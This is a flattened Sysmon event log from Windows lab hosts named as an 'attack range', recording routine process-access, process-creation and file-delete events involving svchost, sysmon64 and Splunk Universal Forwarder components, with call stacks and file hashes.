14:22:48.405{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045012Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:48.405{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045011Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:48.405{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045010Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:48.405{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045009Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:48.405{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045008Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:48.405{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045007Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:48.405{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045006Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:48.405{0A5DF930-E35B-6299-0500-000000006002}4121840C:\Windows\system32\csrss.exe{0A5DF930-1938-629A-3807-000000006002}3116C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000045005Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:48.405{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-1938-629A-3807-000000006002}3116C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000045004Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:48.406{0A5DF930-1938-629A-3807-000000006002}3116C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000045003Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:48.358{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=985C20C599F7E94B3F113793B3205714,SHA256=C661088C1F888B028680B438BD27E95C32977A7B7F015D4A63ED2CA9385358F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045033Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:49.952{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=840C9E061B79F5E8F248096DBE535582,SHA256=1DF04571D322747238C676EC491265BC40602D77352A2C8B8853268DE686F3BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045032Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:49.905{0A5DF930-E3BE-6299-9D00-000000006002}2084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=5CF6FFF4D3ADBED3E69F44177EE01369,SHA256=69EA067DB936BC73EBE16E4B29A50E264C83026289386486689F790F5113971D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218085Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:49.736{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D45B8FDDEEF9F42781A904534ABDCA97,SHA256=A144C9F1E3A080288E660B67BF8989678DA791A26FDAB47B53088D4279EB73D0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000045031Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:49.077{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-1939-629A-3907-000000006002}3944C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045030Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:49.077{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045029Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:49.077{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045028Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:49.077{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045027Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:49.077{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045026Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:49.077{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045025Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:49.077{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045024Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:49.077{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045023Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:49.077{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045022Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:49.077{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045021Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:49.077{0A5DF930-E35B-6299-0500-000000006002}412948C:\Windows\system32\csrss.exe{0A5DF930-1939-629A-3907-000000006002}3944C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000045020Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:49.077{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-1939-629A-3907-000000006002}3944C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000045019Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:49.078{0A5DF930-1939-629A-3907-000000006002}3944C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000045061Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:50.968{0A5DF930-193A-629A-3B07-000000006002}20641592C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000218096Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:50.768{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5332C1EDF84CC43B049D827ECB9F1CB4,SHA256=DEEFC67C2DDE7A6D3AA1A29C77934D4AF6F5363CDA2FDEDA54FB755C709AD3EB,IMPHASH=00000000000000000000000000000000falsetrue 